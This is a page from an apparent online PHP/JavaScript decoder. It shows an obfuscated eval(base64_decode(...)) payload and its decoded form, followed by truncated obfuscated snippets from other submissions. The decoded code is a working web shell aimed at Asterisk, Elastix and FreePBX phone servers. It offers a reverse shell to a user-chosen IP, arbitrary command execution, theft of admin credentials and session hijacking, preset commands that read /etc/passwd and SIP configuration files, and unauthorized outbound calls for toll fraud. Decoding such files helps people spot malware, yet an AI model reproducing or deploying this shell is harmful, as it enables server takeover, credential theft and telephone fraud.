Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php eval(base64_decode("c2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9SRVFVRVNUWydtZDUnXSkgJiYgbWQ1KCRfUkVRVUVTVFsnbWQ1J10pID09ICc1ZWZiZWM2ZmZiZGIyMTAxODk4YjRmNDgwMWJkNmIyYicpIHsKICAgICRfU0VTU0lPTlsnSlVCQVZPSVAnXSA9ICdsb2dnZWQnOwp9CmlmICghaXNzZXQoJF9TRVNTSU9OWydKVUJBVk9JUCddKSkgewogICAgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+JzsKICAgIGVjaG8gJzxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJtZDUiIHNpemU9IjMyIiAvPic7CiAgICBlY2hvICc8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJKVUJBVk9JUCIgdmFsdWU9IkpVQkFWT0lQIiAvPiAnOwogICAgZWNobyAnPC9mb3JtPic7CiAgICBlY2hvICc8PyAtLSBKVUJBVk9JUDoxOTguMTAyLjcwLjEyIC0tID8+JzsKICAgIGV4aXQoKTsKfQppZiAoaXNzZXQoJF9SRVFVRVNUWydpcCddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3BvcnQnXSkpIHsKICAgICRzb2NrID0gZnNvY2tvcGVuKCRfUkVRVUVTVFsnaXAnXSwgJF9SRVFVRVNUWydwb3J0J10pOwogICAgJHByb2MgPSBwcm9jX29wZW4oInB5dGhvbiAtYyAnaW1wb3J0IHB0eTsgcHR5LnNwYXduKFwiYmFzaFwiKSciLCBhcnJheSgwID0+ICRzb2NrLCAxID0+ICRzb2NrLCAyID0+ICRzb2NrKSwgJHBpcGVzKTsKfQppZiAoaXNzZXQoJF9SRVFVRVNUWydhZG1pbiddKSAmJiAkX1JFUVVFU1RbJ2FkbWluJ10gPT0gJ0VsYXN0aXgnKSB7CiAgICBzZXNzaW9uX2Rlc3Ryb3koKTsKICAgIHNlc3Npb25fbmFtZSgiZWxhc3RpeFNlc3Npb24iKTsKICAgIHNlc3Npb25fc3RhcnQoKTsKICAgICRfU0VTU0lPTlsnSlVCQVZPSVAnXSA9ICdsb2dnZWQnOwogICAgaW5jbHVkZV9vbmNlICIvdmFyL3d3dy9odG1sL2xpYnMvcGFsb1NhbnRvREIuY2xhc3MucGhwIjsKICAgIGluY2x1ZGVfb25jZSAiL3Zhci93d3cvaHRtbC9saWJzL3BhbG9TYW50b0FDTC5jbGFzcy5waHAiOwogICAgJHBEQiA9IG5ldyBwYWxvREIoInNxbGl0ZTM6Ly8vL3Zhci93d3cvZGIvYWNsLmRiIik7CiAgICAkZGIgPSAkcERCLT5mZXRjaFRhYmxlKCJTRUxFQ1QgbmFtZSwgbWQ1X3Bhc3N3b3JkLGV4dGVuc2lvbiBmcm9tIGFjbF91c2VyIFdIRVJFIGlkID0nMSciKTsKICAgICRfU0VTU0lPTlsnZWxhc3RpeF91c2VyJ10gPSAkZGJbMF1bMF07CiAgICAkX1NFU1NJT05bJ2VsYXN0aXhfcGFzcyddID0gJGRiWzBdWzFdOwogICAgaGVhZGVyKCJMb2NhdGlvbjogL2luZGV4LnBocCIpOwp9CmlmIChpc3NldCgkX1JFUVVFU1RbJ2FkbWluJ10pICYmICRfUkVRVUVTVFsnYWRtaW4nXSA9PSAnRnJlZXBieCcpIHsKICAgIGlmICghQGluY2x1ZGVfb25jZShnZXRlbnYoJ0ZSRUVQQlhfQ09ORicpID8gZ2V0ZW52KCdGUkVFUEJYX0NPTkYnKSA6ICcvZXRjL2ZyZWVwYnguY29uZicpKSB7CiAgICAgICAgaW5jbHVkZV9vbmNlKCcvZXRjL2FzdGVyaXNrL2ZyZWVwYnguY29uZicpOwogICAgfQogICAgcmVxdWlyZV9vbmNlKCcvdmFyL3d3dy9odG1sL2FkbWluL2xpYnJhcmllcy9hbXB1c2VyLmNsYXNzLnBocCcpOwogICAgJF9TRVNTSU9OWydBTVBfdXNlciddID0gbmV3IGFtcHVzZXIoJGFtcF9jb25mWydBTVBEQlVTRVInXSk7CiAgICAkX1NFU1NJT05bJ0FNUF91c2VyJ10tPnNldEFkbWluKCk7CiAgICBoZWFkZXIoIkxvY2F0aW9uOiAvYWRtaW4vY29uZmlnLnBocCIpOwp9CmlmICghaXNzZXQoJF9SRVFVRVNUWydxJ10pKSB7CiAgICBlY2hvIGJhc2U2NF9kZWNvZGUoJ1BHZ3hJSE4wZVd4bFBTSjBaWGgwTFdGc2FXZHVPaUJqWlc1MFpYSTdJajR0U2xWQ1FWWlBTVkF0UEM5b01UNEtQR1p2Y20wZ1lXTjBhVzl1UFNJaUlHMWxkR2h2WkQwaWNHOXpkQ0krQ2lBZ0lDQThZajVEUVV4TVBDOWlQaUE4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlZMjl1ZEdWNGRDSWdkbUZzZFdVOUltRnpkR1Z5YVhOckxXOTFkR05oYkd4eklpQXZQZ29nSUNBZ1BHbHVjSFYwSUhSNWNHVTlJblJsZUhRaUlHNWhiV1U5SW5ScGJXVWlJSFpoYkhWbFBTSTJNQ0lnTHo0S0lDQWdJRHhwYm5CMWRDQjBlWEJsUFNKMFpYaDBJaUJ1WVcxbFBTSndjbk1pSUhaaGJIVmxQU0l3TUNJZ0x6NEtJQ0FnSUR4cGJuQjFkQ0IwZVhCbFBTSjBaWGgwSWlCdVlXMWxQU0p1ZFcwaUlIQnNZV05sYUc5c1pHVnlQU0p1ZFcxaVpYSWlJQzgrQ2lBZ0lDQThhVzV3ZFhRZ2RIbHdaVDBpYzNWaWJXbDBJaUJ1WVcxbFBTSmpZV3hzSWlCMllXeDFaVDBpWTJGc2JDSWdMejRLUEM5bWIzSnRQanhpY2lBdlBnbzhabTl5YlNCaFkzUnBiMjQ5SWlJZ2JXVjBhRzlrUFNKd2IzTjBJajRLSUNBZ0lEeGlQbEpGVmtWU1UwVWdVMGhGVEV3OEwySStDaUFnSUNBOGFXNXdkWFFnZEhsd1pUMGlkR1Y0ZENJZ2JtRnRaVDBpYVhBaUlIQnNZV05sYUc5c1pHVnlQU0l3TGpBdU1DNHdJaUF2UGdvZ0lDQWdQR2x1Y0hWMElIUjVjR1U5SW5SbGVIUWlJRzVoYldVOUluQnZjblFpSUhaaGJIVmxQU0k0TURnd0lpQXZQZ29nSUNBZ1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdibUZ0WlQwaVkyRnNiQ0lnZG1Gc2RXVTlJa052Ym01bFkzUWlJQzgrQ2p3dlptOXliVDRLUEdKeUlDOCtDanhtYjNKdElHRmpkR2x2YmowaUlpQnRaWFJvYjJROUluQnZjM1FpUGdvZ0lDQWdQR0krUTAxRVBDOWlQZ29nSUNBZ1BHbHVjSFYwSUhSNWNHVTlJblJsZUhRaUlHNWhiV1U5SW1OdFpDSWdjMmw2WlQwbk9EQW5JQzgrQ2lBZ0lDQThhVzV3ZFhRZ2RIbHdaVDBpYzNWaWJXbDBJaUJ1WVcxbFBTSmxlR1ZqZFhSbElpQjJZV3gxWlQwaVJYaGxZM1YwWlNJZ0x6NEtJQ0FnSUR4b2NpQXZQZ29nSUNBZ1BHSjFkSFJ2YmlCMGVYQmxQU0p6ZFdKdGFYUWlJRzVoYldVOUltTnRaQ0lnZG1Gc2RXVTlJbXh6SUMxc1lTSStUR2x6ZENCR2FXeGxQQzlpZFhSMGIyNCtDaUFnUEdKMWRIUnZiaUIwZVhCbFBTSnpkV0p0YVhRaUlHNWhiV1U5SW1OdFpDSWdkbUZzZFdVOUlteHpJQzFzWVNBdmRtRnlMM2QzZHk5b2RHMXNMeUkrVEdsemRDQm9kRzFzUEM5aWRYUjBiMjQrQ2lBZ0lDQThZblYwZEc5dUlIUjVjR1U5SW5OMVltMXBkQ0lnYm1GdFpUMGlZMjFrSWlCMllXeDFaVDBpY0hNZ0xXRjFlQ0F0TFdadmNtVnpkQ0krVUhKdlkyTmxjM01nVEdsemREd3ZZblYwZEc5dVBnb2dJQ0FnUEdKMWRIUnZiaUIwZVhCbFBTSnpkV0p0YVhRaUlHNWhiV1U5SW1OdFpDSWdkbUZzZFdVOUlteGhjM1FpUGt4aGMzUThMMkoxZEhSdmJqNEtJQ0FnSUR4aWRYUjBiMjRnZEhsd1pUMGljM1ZpYldsMElpQnVZVzFsUFNKamJXUWlJSFpoYkhWbFBTZHRlWE54YkNBdExYVnpaWEk5SW5KdmIzUWlJQzB0Y0dGemMzZHZjbVE5SWlJZ0xTMWtZWFJoWW1GelpUMGlZWE4wWlhKcGMyc2lJQzFsSUNKelpXeGxZM1FnS2lCbWNtOXRJR0Z0Y0hWelpYSnpJRnhIT3lJN0p6NUJiWEIxYzJWeWN6d3ZZblYwZEc5dVBnb2dJQ0FnUEdKMWRIUnZiaUIwZVhCbFBTSnpkV0p0YVhRaUlHNWhiV1U5SW1OdFpDSWdkbUZzZFdVOUltTmhkQ0F2WlhSakwzQmhjM04zWkNCOElHZHlaWEFnYzJna0lqNVFZWE56ZDJROEwySjFkSFJ2Ymo0S0lDQWdJRHhpZFhSMGIyNGdkSGx3WlQwaWMzVmliV2wwSWlCdVlXMWxQU0pqYldRaUlIWmhiSFZsUFNKamNtOXVkR0ZpSUMxc0lqNURjbTl1ZEdGaVBDOWlkWFIwYjI0K0NpQWdJQ0E4WW5WMGRHOXVJSFI1Y0dVOUluTjFZbTFwZENJZ2JtRnRaVDBpWTIxa0lpQjJZV3gxWlQwaVlYTjBaWEpwYzJzZ0xYSjRJQ2RqYjNKbElITm9iM2NnWTJoaGJtNWxiSE1uSWo1VGFHOTNJRU5vWVc1dVpXeHpQQzlpZFhSMGIyNCtDaUFnSUNBOFluVjBkRzl1SUhSNWNHVTlJbk4xWW0xcGRDSWdibUZ0WlQwaVkyMWtJaUIyWVd4MVpUMGlZWE4wWlhKcGMyc2dMWEo0SUNkemFYQWdjMmh2ZHlCd1pXVnljeWNpUGxOcGNDQlFaV1Z5Y3p3dlluVjBkRzl1UGdvZ0lDQWdQR0oxZEhSdmJpQjBlWEJsUFNKemRXSnRhWFFpSUc1aGJXVTlJbU50WkNJZ2RtRnNkV1U5SW1GemRHVnlhWE5ySUMxeWVDQW5jR3B6YVhBZ2MyaHZkeUJ5WldkcGMzUnlZWFJwYjI1ekp5SStVRXBUYVhBZ1VtVm5hWE4wY21GMGFXOXVjend2WW5WMGRHOXVQZ29nSUNBZ1BHSjFkSFJ2YmlCMGVYQmxQU0p6ZFdKdGFYUWlJRzVoYldVOUltTnRaQ0lnZG1Gc2RXVTlJbU5oZENBdlpYUmpMMkZ6ZEdWeWFYTnJMM0JxYzJsd0tpSStVRXBUU1ZBOEwySjFkSFJ2Ymo0S0lDQWdJRHhpZFhSMGIyNGdkSGx3WlQwaWMzVmliV2wwSWlCdVlXMWxQU0pqYldRaUlIWmhiSFZsUFNKallYUWdMMlYwWXk5aGMzUmxjbWx6YXk5emFYQmZZV1JrYVhScGIyNWhiQzVqYjI1bUlqNVRTVkFnUVdSa2FYUnBiMjVoYkR3dlluVjBkRzl1UGdvZ0lDQWdQR0oxZEhSdmJpQjBlWEJsUFNKemRXSnRhWFFpSUc1aGJXVTlJbU50WkNJZ2RtRnNkV1U5SW1OaGRDQXZaWFJqTDJGemRHVnlhWE5yTDJWNGRHVnVjMmx2Ym5OZlkzVnpkRzl0TG1OdmJtWWlQa1Y0ZEdWdWMybHZibk04TDJKMWRIUnZiajRLSUNBZ0lEeGlkWFIwYjI0Z2RIbHdaVDBpYzNWaWJXbDBJaUJ1WVcxbFBTSmpiV1FpSUhaaGJIVmxQU0pqWVhRZ0wyVjBZeTlsYkdGemRHbDRMbU52Ym1ZaVBrVnNZWE4wYVhndVkyOXVaand2WW5WMGRHOXVQZ29nSUNBZ1BHSjFkSFJ2YmlCMGVYQmxQU0p6ZFdKdGFYUWlJRzVoYldVOUltTnRaQ0lnZG1Gc2RXVTlJbU5oZENBdlpYUmpMMmx6YzJGaWJHVXVZMjl1WmlJK1NYTnpZV0pzWlM1amIyNW1QQzlpZFhSMGIyNCtDaUFnSUNBOFluVjBkRzl1SUhSNWNHVTlJbk4xWW0xcGRDSWdibUZ0WlQwaVkyMWtJaUIyWVd4MVpUMGlZMkYwSUM5bGRHTXZZVzF3YjNKMFlXd3VZMjl1WmlJK1lXMXdiM0owWVd3dVkyOXVaand2WW5WMGRHOXVQZ284TDJadmNtMCtDanhtYjNKdElHRmpkR2x2YmowaUlpQnRaWFJvYjJROUltZGxkQ0krQ2lBZ0lDQThhVzV3ZFhRZ2RIbHdaVDBpYzNWaWJXbDBJaUJ1WVcxbFBTSmhaRzFwYmlJZ2RtRnNkV1U5SWtWc1lYTjBhWGdpSUM4K0NpQWdJQ0E4YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCdVlXMWxQU0poWkcxcGJpSWdkbUZzZFdVOUlrWnlaV1Z3WW5naUlDOCtDand2Wm05eWJUNEtQSEJ5WlQ0PScpOwogICAgZWNobyAnPHByZT4nOwp9CmlmIChpc3NldCgkX1JFUVVFU1RbJ2NtZCddKSkgewogICAgZWNobyBzeXN0ZW0oJF9SRVFVRVNUWydjbWQnXSk7Cn0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnY2FsbCddKSkgewogICAgc3lzdGVtKCdhc3RlcmlzayAtcnggImNoYW5uZWwgb3JpZ2luYXRlIExvY2FsLycgLiAkX1JFUVVFU1RbJ3BycyddIC4gJF9SRVFVRVNUWydudW0nXSAuICdAJyAuICRfUkVRVUVTVFsnY29udGV4dCddIC4gJyBhcHBsaWNhdGlvbiB3YWl0ICcgLiAkX1JFUVVFU1RbJ3RpbWUnXSAuICciJyk7Cn0K")); ?>

Show other level

Decrypted code level 1:


session_start();
if (isset($_REQUEST['md5']) && md5($_REQUEST['md5']) == '5efbec6ffbdb2101898b4f4801bd6b2b') {
    $_SESSION['JUBAVOIP'] = 'logged';
}
if (!isset($_SESSION['JUBAVOIP'])) {
    echo '<form action="" method="post">';
    echo '<input type="text" name="md5" size="32" />';
    echo '<input type="submit" name="JUBAVOIP" value="JUBAVOIP" /> ';
    echo '</form>';
    echo '-- JUBAVOIP:198.102.70.12 --';
    
}
if (isset($_REQUEST['ip']) && isset($_REQUEST['port'])) {
    $sock = fsockopen($_REQUEST['ip'], $_REQUEST['port']);
    $proc = proc_open("python -c 'import pty; pty.spawn(\"bash\")'", array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
}
if (isset($_REQUEST['admin']) && $_REQUEST['admin'] == 'Elastix') {
    session_destroy();
    session_name("elastixSession");
    session_start();
    $_SESSION['JUBAVOIP'] = 'logged';
    include_once "/var/www/html/libs/paloSantoDB.class.php";
    include_once "/var/www/html/libs/paloSantoACL.class.php";
    $pDB = new paloDB("sqlite3:////var/www/db/acl.db");
    $db = $pDB->fetchTable("SELECT name, md5_password,extension from acl_user WHERE id ='1'");
    $_SESSION['elastix_user'] = $db[0][0];
    $_SESSION['elastix_pass'] = $db[0][1];
    header("Location: /index.php");
}
if (isset($_REQUEST['admin']) && $_REQUEST['admin'] == 'Freepbx') {
    if (!@include_once(getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
        include_once('/etc/asterisk/freepbx.conf');
    }
    require_once('/var/www/html/admin/libraries/ampuser.class.php');
    $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
    $_SESSION['AMP_user']->setAdmin();
    header("Location: /admin/config.php");
}
if (!isset($_REQUEST['q'])) {
    echo base64_decode('PGgxIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij4tSlVCQVZPSVAtPC9oMT4KPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+CiAgICA8Yj5DQUxMPC9iPiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY29udGV4dCIgdmFsdWU9ImFzdGVyaXNrLW91dGNhbGxzIiAvPgogICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InRpbWUiIHZhbHVlPSI2MCIgLz4KICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwcnMiIHZhbHVlPSIwMCIgLz4KICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJudW0iIHBsYWNlaG9sZGVyPSJudW1iZXIiIC8+CiAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJjYWxsIiB2YWx1ZT0iY2FsbCIgLz4KPC9mb3JtPjxiciAvPgo8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0Ij4KICAgIDxiPlJFVkVSU0UgU0hFTEw8L2I+CiAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iaXAiIHBsYWNlaG9sZGVyPSIwLjAuMC4wIiAvPgogICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBvcnQiIHZhbHVlPSI4MDgwIiAvPgogICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iY2FsbCIgdmFsdWU9IkNvbm5lY3QiIC8+CjwvZm9ybT4KPGJyIC8+Cjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPgogICAgPGI+Q01EPC9iPgogICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNtZCIgc2l6ZT0nODAnIC8+CiAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJleGVjdXRlIiB2YWx1ZT0iRXhlY3V0ZSIgLz4KICAgIDxociAvPgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9ImxzIC1sYSI+TGlzdCBGaWxlPC9idXR0b24+CiAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9ImxzIC1sYSAvdmFyL3d3dy9odG1sLyI+TGlzdCBodG1sPC9idXR0b24+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0icHMgLWF1eCAtLWZvcmVzdCI+UHJvY2Nlc3MgTGlzdDwvYnV0dG9uPgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9Imxhc3QiPkxhc3Q8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSdteXNxbCAtLXVzZXI9InJvb3QiIC0tcGFzc3dvcmQ9IiIgLS1kYXRhYmFzZT0iYXN0ZXJpc2siIC1lICJzZWxlY3QgKiBmcm9tIGFtcHVzZXJzIFxHOyI7Jz5BbXB1c2VyczwvYnV0dG9uPgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9ImNhdCAvZXRjL3Bhc3N3ZCB8IGdyZXAgc2gkIj5QYXNzd2Q8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJjcm9udGFiIC1sIj5Dcm9udGFiPC9idXR0b24+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0iYXN0ZXJpc2sgLXJ4ICdjb3JlIHNob3cgY2hhbm5lbHMnIj5TaG93IENoYW5uZWxzPC9idXR0b24+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0iYXN0ZXJpc2sgLXJ4ICdzaXAgc2hvdyBwZWVycyciPlNpcCBQZWVyczwvYnV0dG9uPgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9ImFzdGVyaXNrIC1yeCAncGpzaXAgc2hvdyByZWdpc3RyYXRpb25zJyI+UEpTaXAgUmVnaXN0cmF0aW9uczwvYnV0dG9uPgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9ImNhdCAvZXRjL2FzdGVyaXNrL3Bqc2lwKiI+UEpTSVA8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJjYXQgL2V0Yy9hc3Rlcmlzay9zaXBfYWRkaXRpb25hbC5jb25mIj5TSVAgQWRkaXRpb25hbDwvYnV0dG9uPgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9ImNhdCAvZXRjL2FzdGVyaXNrL2V4dGVuc2lvbnNfY3VzdG9tLmNvbmYiPkV4dGVuc2lvbnM8L2J1dHRvbj4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJjbWQiIHZhbHVlPSJjYXQgL2V0Yy9lbGFzdGl4LmNvbmYiPkVsYXN0aXguY29uZjwvYnV0dG9uPgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIG5hbWU9ImNtZCIgdmFsdWU9ImNhdCAvZXRjL2lzc2FibGUuY29uZiI+SXNzYWJsZS5jb25mPC9idXR0b24+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0iY21kIiB2YWx1ZT0iY2F0IC9ldGMvYW1wb3J0YWwuY29uZiI+YW1wb3J0YWwuY29uZjwvYnV0dG9uPgo8L2Zvcm0+Cjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9ImdldCI+CiAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJhZG1pbiIgdmFsdWU9IkVsYXN0aXgiIC8+CiAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJhZG1pbiIgdmFsdWU9IkZyZWVwYngiIC8+CjwvZm9ybT4KPHByZT4=');
    echo '<pre>';
}
if (isset($_REQUEST['cmd'])) {
    echo system($_REQUEST['cmd']);
}
if (isset($_REQUEST['call'])) {
    system('asterisk -rx "channel originate Local/' . $_REQUEST['prs'] . $_REQUEST['num'] . '@' . $_REQUEST['context'] . ' application wait ' . $_REQUEST['time'] . '"');
}

Decrypted code level 2:


session_start();
if (isset($_REQUEST['md5']) && md5($_REQUEST['md5']) == '5efbec6ffbdb2101898b4f4801bd6b2b') {
    $_SESSION['JUBAVOIP'] = 'logged';
}
if (!isset($_SESSION['JUBAVOIP'])) {
    echo '<form action="" method="post">';
    echo '<input type="text" name="md5" size="32" />';
    echo '<input type="submit" name="JUBAVOIP" value="JUBAVOIP" /> ';
    echo '</form>';
    echo '-- JUBAVOIP:198.102.70.12 --';
    
}
if (isset($_REQUEST['ip']) && isset($_REQUEST['port'])) {
    $sock = fsockopen($_REQUEST['ip'], $_REQUEST['port']);
    $proc = proc_open("python -c 'import pty; pty.spawn(\"bash\")'", array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
}
if (isset($_REQUEST['admin']) && $_REQUEST['admin'] == 'Elastix') {
    session_destroy();
    session_name("elastixSession");
    session_start();
    $_SESSION['JUBAVOIP'] = 'logged';
    include_once "/var/www/html/libs/paloSantoDB.class.php";
    include_once "/var/www/html/libs/paloSantoACL.class.php";
    $pDB = new paloDB("sqlite3:////var/www/db/acl.db");
    $db = $pDB->fetchTable("SELECT name, md5_password,extension from acl_user WHERE id ='1'");
    $_SESSION['elastix_user'] = $db[0][0];
    $_SESSION['elastix_pass'] = $db[0][1];
    header("Location: /index.php");
}
if (isset($_REQUEST['admin']) && $_REQUEST['admin'] == 'Freepbx') {
    if (!@include_once(getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
        include_once('/etc/asterisk/freepbx.conf');
    }
    require_once('/var/www/html/admin/libraries/ampuser.class.php');
    $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
    $_SESSION['AMP_user']->setAdmin();
    header("Location: /admin/config.php");
}
if (!isset($_REQUEST['q'])) {
    echo <h1 style="text-align: center;">-JUBAVOIP-</h1>
<form action="" method="post">
    <b>CALL</b> <input type="text" name="context" value="asterisk-outcalls" />
    <input type="text" name="time" value="60" />
    <input type="text" name="prs" value="00" />
    <input type="text" name="num" placeholder="number" />
    <input type="submit" name="call" value="call" />
</form><br />
<form action="" method="post">
    <b>REVERSE SHELL</b>
    <input type="text" name="ip" placeholder="0.0.0.0" />
    <input type="text" name="port" value="8080" />
    <input type="submit" name="call" value="Connect" />
</form>
<br />
<form action="" method="post">
    <b>CMD</b>
    <input type="text" name="cmd" size='80' />
    <input type="submit" name="execute" value="Execute" />
    <hr />
    <button type="submit" name="cmd" value="ls -la">List File</button>
  <button type="submit" name="cmd" value="ls -la /var/www/html/">List html</button>
    <button type="submit" name="cmd" value="ps -aux --forest">Proccess List</button>
    <button type="submit" name="cmd" value="last">Last</button>
    <button type="submit" name="cmd" value='mysql --user="root" --password="" --database="asterisk" -e "select * from ampusers \G;";'>Ampusers</button>
    <button type="submit" name="cmd" value="cat /etc/passwd | grep sh$">Passwd</button>
    <button type="submit" name="cmd" value="crontab -l">Crontab</button>
    <button type="submit" name="cmd" value="asterisk -rx 'core show channels'">Show Channels</button>
    <button type="submit" name="cmd" value="asterisk -rx 'sip show peers'">Sip Peers</button>
    <button type="submit" name="cmd" value="asterisk -rx 'pjsip show registrations'">PJSip Registrations</button>
    <button type="submit" name="cmd" value="cat /etc/asterisk/pjsip*">PJSIP</button>
    <button type="submit" name="cmd" value="cat /etc/asterisk/sip_additional.conf">SIP Additional</button>
    <button type="submit" name="cmd" value="cat /etc/asterisk/extensions_custom.conf">Extensions</button>
    <button type="submit" name="cmd" value="cat /etc/elastix.conf">Elastix.conf</button>
    <button type="submit" name="cmd" value="cat /etc/issable.conf">Issable.conf</button>
    <button type="submit" name="cmd" value="cat /etc/amportal.conf">amportal.conf</button>
</form>
<form action="" method="get">
    <input type="submit" name="admin" value="Elastix" />
    <input type="submit" name="admin" value="Freepbx" />
</form>
<pre>;
    echo '<pre>';
}
if (isset($_REQUEST['cmd'])) {
    echo system($_REQUEST['cmd']);
}
if (isset($_REQUEST['call'])) {
    system('asterisk -rx "channel originate Local/' . $_REQUEST['prs'] . $_REQUEST['num'] . '@' . $_REQUEST['context'] . ' application wait ' . $_REQUEST['time'] . '"');
}

Recent submissions:

<?php eval(base64_decode("c2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9SRVFVRVNUWydtZDUnXSkgJi... (function(_0x18b380,_0x251128){function _0x21132d(_0x1b2c56,_0x3a436b,_0x4ccaff,_0x4d3522,... class Home extends MY_Controller { public function __construct() { parent::__construct();... <?php $password = '0c77b9949b3f9c2db133ee7db2620b99'; error_reporting(0); set_time_limi... var _0x5cd3=['QHXCm1NEw6Bvwp3Dlhk=','N8KdwojCuw==','D2sIXCpNbSnCnVM=','wp/ClMK5w4bCgyEjD8K... <?php //002cd if(extension_loaded('ionCube Loader')){die('The file '.__FILE__." is corrup... HR+cPrE9L9pZEQtJ+cN1lq7fJCxtPQF/yb+lHlKTtKq8KjuDfE6jVL4xsCh+Dmc2K4Wj7G9V6HVJ i5AdcW4Q+I... <?php $payload = 'ZXZhbCgkaWYoZW1wdHkoJGRlY29kZSkgJiYgJGxlbj09PTEpIHskcGxheWxvYWR9IDsgZWx... <?php $code = 'ZXZhbChiYXNlNjRfZGVjb2RlKCdjcmltZShmcmllbmQoIkhlbGxvIFdvcmxkIikpJykpOw==';... <?php define('A', 'jan06.tphu5563htr/suruga::shopdetail/^^!!|[word]/[0:1]^?pid=!::'); goto...